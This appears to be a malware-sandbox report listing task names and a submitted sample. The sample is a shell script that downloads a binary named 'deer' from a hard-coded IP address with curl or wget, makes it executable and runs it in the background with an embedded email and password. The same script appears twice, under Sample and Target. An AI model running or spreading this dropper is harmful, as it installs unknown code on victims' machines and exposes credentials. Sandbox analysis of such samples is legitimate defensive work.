Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://#!/bin/sh if [ $(ps | grep deer | grep -v grep | grep -v "" | wc -l) -eq 1 ]; then exit; fi (curl -o /tmp/deer 134.213.29.14:82/grep.$(uname -m) || wget -O /tmp/deer 134.213.29.14:82/grep.$(uname -m)) chmod +x /tmp/deer /tmp/deer [email protected] -password=m4z4r@123 -device-name=$HOSTNAME -accept-tos 1>/dev/null 2>&1 &
Resource
win10v2004-20240412-en
General
-
Target
http://#!/bin/sh if [ $(ps | grep deer | grep -v grep | grep -v "" | wc -l) -eq 1 ]; then exit; fi (curl -o /tmp/deer 134.213.29.14:82/grep.$(uname -m) || wget -O /tmp/deer 134.213.29.14:82/grep.$(uname -m)) chmod +x /tmp/deer /tmp/deer [email protected] -password=m4z4r@123 -device-name=$HOSTNAME -accept-tos 1>/dev/null 2>&1 &